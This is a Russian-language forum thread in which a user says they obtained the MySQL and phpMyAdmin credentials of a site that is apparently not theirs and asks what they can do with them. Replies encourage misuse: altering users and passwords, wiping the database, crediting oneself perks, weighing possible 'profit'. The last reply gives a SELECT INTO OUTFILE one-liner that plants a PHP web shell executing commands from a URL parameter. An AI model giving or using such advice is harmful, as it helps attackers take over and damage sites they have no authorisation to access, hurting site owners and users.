База данных MySql, Что могу сделать?

Discussion in 'PHP' started by Trifa, 18 Dec 2020.

  1. Trifa

    Trifa New Member

    Joined:
    18 Dec 2020
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Есть некий сайт, написанный на php как понимаю, сильно в этом не разбираюсь, у него есть панель PhpMyAdmin, неким образом я получил логин и пароль от базы данных MySql этого сайта, что я могу с этим сделать и как?
     
  2. misspo

    misspo New Member

    Joined:
    28 Oct 2019
    Messages:
    5
    Likes Received:
    1
    Reputations:
    0
    Смотря какая роль на этом сайте - просто юзер (можно попакостить, конечно, но ничего не мешает админу восстановить бекап БД и сменить все данные от БД и хоста, а так можно по тихой грусти себе как юзеру разные виртуальные плюшки начислять) , если сам админ (написал бы ты лучше нормальную админку себе чем все через базу править, надоедает быстро)
     
  3. alexzir

    alexzir Well-Known Member

    Joined:
    29 Oct 2019
    Messages:
    307
    Likes Received:
    1,103
    Reputations:
    17
    Если есть административный доступ к БД сайта, то вы можете очень многое, от редактирования контента, пользователей, паролей и прочего до полного обнуления сайта с удалением всей информации. Но это сработает только до смены паролей администратором и исправляется восстановлением БД из резервной копии. Обычно пароли от хостинга не хранятся в БД сайта, так что данные хоста сменить вряд ли получится, хотя кто его знает, что там за база и как она сконфигурирована :)
     
  4. ProDevOps

    ProDevOps New Member

    Joined:
    27 Nov 2020
    Messages:
    5
    Likes Received:
    4
    Reputations:
    0
    С такой постановкой вопроса вы вряд ли что-то сделаете. Хотя бы тематику сайта укажите, язык, примерную посещаемость, тогда вам смогут подсказать конкретные возможные действия и примерный профит, который вы теоретически можете получить. А что касается технической стороны вопроса, то неплохо бы для начала узнать, какие привилегии у вашего пользователя MySQL:
    [​IMG]
    [​IMG]

    Если вам доступен SELECT INTO OUTFILE. то можно попробовать залить веб-шелл:

    SELECT "<?php echo system($_GET['cmd']); ?>" INTO OUTFILE "full/path/shell.php"

    Хотя, вероятно, если вы вытащили логин и пароль от БД, то чтение или даже запись файлов вам уже доступна...
     
Loading...